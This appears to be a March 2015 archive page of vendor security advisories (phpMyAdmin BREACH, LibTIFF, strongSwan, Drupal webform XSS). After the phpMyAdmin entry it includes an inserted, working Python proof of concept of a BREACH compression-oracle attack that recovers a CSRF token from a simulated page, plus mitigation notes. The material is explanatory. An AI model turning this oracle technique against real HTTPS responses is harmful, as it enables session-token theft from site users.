Ericsson Drutt MSDP (3PI Manager) versions 4, 5, and 6 suffer from an open redirection vulnerability.
Monthly Archives: March 2015
Red Hat Security Advisory 2015-0765-01
Red Hat Security Advisory 2015-0765-01 – Red Hat JBoss Data Virtualization is a lean data integration solution that provides easy, real-time, and unified data access across disparate sources to multiple applications and users. JBoss Data Virtualization makes data spread across physically distinct systems, such as multiple databases, XML files, and even Hadoop systems, appear as a set of tables in a local database. This roll up patch serves as a cumulative upgrade for Red Hat JBoss Data Virtualization 6.0.0. It includes various bug fixes, which are listed in the README file included with the patch files.
Mandriva Linux Security Advisory 2015-186
Mandriva Linux Security Advisory 2015-186 – libraries/select_lang.lib.php in phpMyAdmin 4.0.x before 4.0.10.9, 4.2.x before 4.2.13.2, and 4.3.x before 4.3.11.1 includes invalid language values in unknown-language error responses that contain a CSRF token and may be sent with HTTP compression, which makes it easier for remote attackers to conduct a BREACH attack and determine this token via a series of crafted requests. This upgrade provides the latest phpmyadmin version to address this vulnerability. Additionally, the phpseclib package has been upgraded to the 0.3.10 version.
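The advisory above describes the precondition for BREACH: attacker-controlled input (the invalid language value) is reflected into a response that also carries a secret (the CSRF token), and that response goes out HTTP-compressed. The following is an added example, not code from the advisory, Mandriva or phpMyAdmin: the page layout, the token and the compressor are all constructed here. The compressor is a bare LZ77 stage with no Huffman coding, so the length oracle is exact; real DEFLATE adds Huffman noise, which the original BREACH paper works around with its "two tries" technique.

```python
"""BREACH-style compression oracle against a reflected CSRF token.

Added example (not the advisory's or phpMyAdmin's code). Models the vulnerable
pattern: an attacker-controlled value is echoed into a compressed error page
that also carries the anti-CSRF token. Page, token and compressor are all
constructed; the compressor is LZ77 only, so the length oracle is noise-free.
"""
from typing import List, Tuple, Union

SECRET_TOKEN = "7f3a9c"           # constructed; short hex token for the demo
TOKEN_ALPHABET = "0123456789abcdef"
WINDOW = 32 * 1024                # DEFLATE-sized back-reference window
MIN_MATCH = 3                     # DEFLATE's minimum back-reference length

LzSymbol = Union[int, Tuple[int, int]]   # literal byte or (distance, length)


def render_error_page(lang: str, token: str = SECRET_TOKEN) -> bytes:
    """Constructed unknown-language error page (hypothetical markup): the
    unvalidated ``lang`` value is reflected shortly before the CSRF token."""
    return (
        "<html><body>\n"
        f"<p>Unknown language: {lang}</p>\n"
        f'<input type="hidden" name="token" value="{token}"/>\n'
        "</body></html>\n"
    ).encode()


def lz77(data: bytes) -> List[LzSymbol]:
    """Greedy LZ77: take the longest earlier match within WINDOW, else emit
    a literal. Overlapping matches are allowed, as in DEFLATE."""
    out: List[LzSymbol] = []
    i, n = 0, len(data)
    while i < n:
        best_len = best_dist = 0
        for j in range(max(0, i - WINDOW), i):
            k = 0
            while i + k < n and data[j + k] == data[i + k]:
                k += 1
            if k > best_len:
                best_len, best_dist = k, i - j
        if best_len >= MIN_MATCH:
            out.append((best_dist, best_len))
            i += best_len
        else:
            out.append(data[i])
            i += 1
    return out


def compressed_size(body: bytes) -> int:
    """Bytes on the wire under a simple cost model: 1 per literal, 3 per
    back-reference. Only the difference between responses matters here."""
    return sum(1 if isinstance(s, int) else 3 for s in lz77(body))


def recover_token(token: str = SECRET_TOKEN, max_len: int = 64) -> str:
    """Attacker side: learn the token one character per round.

    Each request reflects ``value="<known><guess>``. A correct guess lets the
    reflected text and the real token share a one-character-longer LZ77 match,
    so the response shrinks by one literal; every wrong guess compresses to
    the same size. When no guess shrinks the page, the token is complete.
    """
    known = ""
    for _ in range(max_len):
        sizes = {
            c: compressed_size(render_error_page(f'value="{known}{c}', token))
            for c in TOKEN_ALPHABET
        }
        if min(sizes.values()) == max(sizes.values()):
            break                     # oracle gives nothing more: done
        known += min(sizes, key=sizes.get)
    return known


if __name__ == "__main__":
    print("recovered:", recover_token())
```

The attacker never reads the page body, only its compressed size, which is why TLS does not help and why the fix is to stop putting the reflected value and the secret in the same compressed response (or to disable compression or mask the token per response). Swapping in `zlib.compress` for `lz77` shows the Huffman noise that makes the real attack need repeated measurements.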
Debian Security Advisory 3210-1
Debian Linux Security Advisory 3210-1 – Multiple vulnerabilities were discovered in the Wireshark dissectors/parsers for WCP, pcapng and TNEF, which could result in denial of service.
Ubuntu Security Notice USN-2553-1
Ubuntu Security Notice 2553-1 – William Robinet discovered that LibTIFF incorrectly handled certain malformed images. If a user or automated system were tricked into opening a specially crafted image, a remote attacker could crash the application, leading to a denial of service, or possibly execute arbitrary code with user privileges. Paris Zoumpouloglou discovered that LibTIFF incorrectly handled certain malformed BMP images. If a user or automated system were tricked into opening a specially crafted BMP image, a remote attacker could crash the application, leading to a denial of service. Various other issues were also addressed.
Java.com Cross Site Scripting
Java.com suffered from multiple cross-site scripting vulnerabilities.
Fedora EPEL 7 Security Update: strongswan-5.3.0-1.el7
Resolved Bugs
1178957 – CVE-2014-9221 strongswan: denial-of-service vulnerability in libtls when processing crafted Key Exchange payload [epel-all]
1173064 – CVE-2014-9221 strongswan: denial-of-service vulnerability in libtls when processing crafted Key Exchange payload
New upstream release 5.3.0.
Fixes CVE-2014-9221 denial-of-service vulnerability.
Fedora EPEL 6 Security Update: drupal7-webform-4.7-1.el6
Resolved Bugs
1206400 – drupal7-webform-4.7 is available
1205122 – drupal webform: multiple XSS flaws
1199067 – drupal7-webform-4.5 is available
1150458 – drupal7-webform-4.2 is available
1205126 – drupal7-webform: drupal webform: multiple XSS flaws [epel-6]
1204540 – drupal7-webform-4.6 is available
1193356 – drupal7-webform-4.3 is available
– Update to 4.7
– Release notes can be found at https://www.drupal.org/node/2460229
– Security fix for drupal7-webform module
– Upstream release notes: https://www.drupal.org/node/2457219
– Release notes can be found at https://www.drupal.org/node/2454063
– Update to 4.3
– Release notes can be found at https://www.drupal.org/node/2427257
– Update to 4.2
– Release notes can be found at https://www.drupal.org/node/2381793
Fedora EPEL 6 Security Update: strongswan-5.3.0-1.el6
Resolved Bugs
1205617 – CVE-2014-9221 strongswan: denial-of-service vulnerability in libtls when processing crafted Key Exchange payload [epel-all]
New upstream release 5.3.0.